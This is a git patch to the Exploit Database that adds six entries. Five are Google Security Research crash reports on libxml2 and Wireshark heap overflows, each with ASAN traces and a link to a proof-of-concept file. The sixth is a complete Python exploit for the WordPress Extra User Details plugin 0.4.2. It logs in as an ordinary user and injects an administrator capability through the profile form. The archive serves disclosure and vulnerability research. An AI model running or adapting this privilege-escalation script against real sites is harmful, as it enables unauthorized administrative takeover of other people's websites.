From 5f28d686115d2268e67ba95704ded70452af1801 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Feb 2016 05:01:57 +0000 Subject: [PATCH] DB: 2016-02-25 6 new exploits --- files.csv | 6 ++ platforms/linux/dos/39491.txt | 82 ++++++++++++++++++++++ platforms/linux/dos/39492.txt | 85 +++++++++++++++++++++++ platforms/linux/dos/39493.txt | 68 +++++++++++++++++++ platforms/linux/dos/39494.txt | 78 +++++++++++++++++++++ platforms/multiple/dos/39490.txt | 66 ++++++++++++++++++ platforms/php/webapps/39489.py | 113 +++++++++++++++++++++++++++++++ 7 files changed, 498 insertions(+) create mode 100755 platforms/linux/dos/39491.txt create mode 100755 platforms/linux/dos/39492.txt create mode 100755 platforms/linux/dos/39493.txt create mode 100755 platforms/linux/dos/39494.txt create mode 100755 platforms/multiple/dos/39490.txt create mode 100755 platforms/php/webapps/39489.py diff --git a/files.csv b/files.csv index 2fe630d53..e15433ab3 100755 --- a/files.csv +++ b/files.csv @@ -35725,3 +35725,9 @@ id,file,description,date,author,platform,type,port 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443 +39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 +39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0 +39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 diff --git a/platforms/linux/dos/39491.txt b/platforms/linux/dos/39491.txt new file mode 100755 index 000000000..65c786ea7 --- /dev/null +++ b/platforms/linux/dos/39491.txt @@ -0,0 +1,82 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=637 + +The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"): + +--- cut --- +==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290 +READ of size 73661 at 0x631000010810 thread T0 + #0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 + #1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5 + #2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11 + #3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12 + #4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12 + #5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16 + #6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8 + #7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3 + #8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5 + #9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5 + #10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13 + #11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8 + #12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810) +allocated by thread T0 here: + #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61 + #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23 + #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11 + #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9 + #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8 + #5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6 + #6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12 + #7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16 + #8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8 + #9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3 + #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5 + #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5 + #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13 + #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8 + #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy +Shadow bytes around the buggy address: + 0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==25920==ABORTING +--- cut --- + +The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39491.zip + diff --git a/platforms/linux/dos/39492.txt b/platforms/linux/dos/39492.txt new file mode 100755 index 000000000..77c2418e6 --- /dev/null +++ b/platforms/linux/dos/39492.txt @@ -0,0 +1,85 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=638 + +The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"): + +--- cut --- +==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568 +READ of size 1 at 0x6290000049e6 thread T0 + #0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13 + #1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2 + #2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6 + #3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5 + #4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6 + #5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5 + #6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2 + #7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5 + #8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13 + #9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9 + #10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204) +allocated by thread T0 here: + #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61 + #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23 + #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11 + #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9 + #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8 + #5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5 + #6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6 + #7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12 + #8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9 + #9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17 + #10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16 + #11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6 + #12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5 + #13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6 + #14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5 + #15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2 + #16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5 + #17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13 + #18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9 + #19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2 +Shadow bytes around the buggy address: + 0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa + 0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==4588==ABORTING +--- cut --- + +The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39492.zip + diff --git a/platforms/linux/dos/39493.txt b/platforms/linux/dos/39493.txt new file mode 100755 index 000000000..298ae9c03 --- /dev/null +++ b/platforms/linux/dos/39493.txt @@ -0,0 +1,68 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=639 + +The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"): + +--- cut --- +==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828 +READ of size 1 at 0x6290000051ff thread T0 + #0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6 + #1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9 + #2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2 + #3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5 + #4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9 + #5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5 + #6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2 + #7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2 + #8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5 + #9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13 + #10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9 + #11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200) +allocated by thread T0 here: + #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7f4df5219729 (/lib/x86_64-linux-gnu/libz.so.1+0xf729) + +SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal +Shadow bytes around the buggy address: + 0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] + 0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==4210==ABORTING +--- cut --- + +The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39493.zip + diff --git a/platforms/linux/dos/39494.txt b/platforms/linux/dos/39494.txt new file mode 100755 index 000000000..34d394b9e --- /dev/null +++ b/platforms/linux/dos/39494.txt @@ -0,0 +1,78 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=636 + +The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"): + +--- cut --- +==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88 +READ of size 1 at 0x62100001c900 thread T0 + #0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6 + #1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8 + #2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5 + #3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3 + #4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5 + #5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5 + #6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13 + #7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8 + #8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900) +allocated by thread T0 here: + #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32 + #2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34 + #3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12 + #4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11 + #5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13 + #6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9 + #7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12 + #8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12 + #9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3 + #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5 + #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5 + #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13 + #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8 + #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7 + +SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar +Shadow bytes around the buggy address: + 0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==26202==ABORTING +--- cut --- + +The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39494.zip + diff --git a/platforms/multiple/dos/39490.txt b/platforms/multiple/dos/39490.txt new file mode 100755 index 000000000..b651283bf --- /dev/null +++ b/platforms/multiple/dos/39490.txt @@ -0,0 +1,66 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=647 + +The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0 +WRITE of size 1425 at 0x61b00001e95c thread T0 + #0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 + #1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5 + #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20 + #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10 + #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7 + #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12 + #6 0x52c1df in main wireshark/tshark.c:2197:13 + +0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c) +allocated by thread T0 here: + #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) + #2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2 + #3 0x53214d in cf_open wireshark/tshark.c:4195:9 + #4 0x52bc7e in main wireshark/tshark.c:2188:9 + +SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy +Shadow bytes around the buggy address: + 0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa + 0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==5869==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip + diff --git a/platforms/php/webapps/39489.py b/platforms/php/webapps/39489.py new file mode 100755 index 000000000..b1398ea67 --- /dev/null +++ b/platforms/php/webapps/39489.py @@ -0,0 +1,113 @@ +""" +* Exploit Title: Extra User Details [Privilege Escalation] +* Discovery Date: 2016-02-13 +* Exploit Author: Panagiotis Vagenas +* Author Link: https://twitter.com/panVagenas +* Vendor Homepage: http://vadimk.com/ +* Software Link: https://wordpress.org/plugins/extra-user-details/ +* Version: 0.4.2 +* Tested on: WordPress 4.4.2 +* Category: WebApps, WordPress + + +Description +----------- + +_Extra User Details_ plugin for WordPress suffers from a Privilege +Escalation +vulnerability. + +The plugin hooks the `eud_update_ExtraFields` function to `profile_update` +WordPress action. This function doesn't properly check user capabilities +and +updates all meta information passed to post data. The only condition is +that +the post variable name has the `eud` prefix which is striped before +updating +the values in DB. + +An attacker can exploit this misbehavior to update the +{prefix}\_capabilities + meta information to gain administrative privileges. + +PoC +--- + +In the following PoC we assume that the database has the `wp` prefix, a +very +common scenario as this is the default WordPress value + +""" +# !/usr/bin/python3 + +################################################################################ +# Extra User Details Privilege Escalation Exploit +# +# Author: Panagiotis Vagenas +# +# Dependencies: BeautifulSoup +(http://www.crummy.com/software/BeautifulSoup/) +################################################################################ + +import requests +from bs4 import BeautifulSoup + +baseUrl = 'http://example.com' +loginUrl = baseUrl + '/wp-login.php' +profileUrl = baseUrl + '/wp-admin/profile.php' + +loginPostData = { + 'log': 'username', + 'pwd': 'password', + 'rememberme': 'forever', + 'wp-submit': 'Log+In' +} + +s = requests.Session() + +r = s.post(loginUrl, loginPostData) + +if r.status_code != 200: + print('Login error') + exit(1) + +r = s.get(profileUrl) +soup = BeautifulSoup(r.text, 'html.parser') + +f = soup.find('form', {'id': 'your-profile'}) +if not f: + print('Error') + exit(1) + +data = { + 'eudwp_capabilities[administrator]': 1, +} + +for i in f.find_all('input'): + if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']: + data[i.attrs['name']] = i.attrs['value'] + +r = s.post(profileUrl, data) + +if r.status_code == 200: + print('Success') + +exit(0) + +""" + +Solution +-------- + +Upgrade to v0.4.2.1 + +Timeline +-------- + +1. **2016-02-13**: Vendor notified through wordpress.org support forums +2. **2016-02-13**: Vendor notified through through the contact form in +his website +3. **2016-02-13**: Vendor responded and received details about this issue +4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue + +"""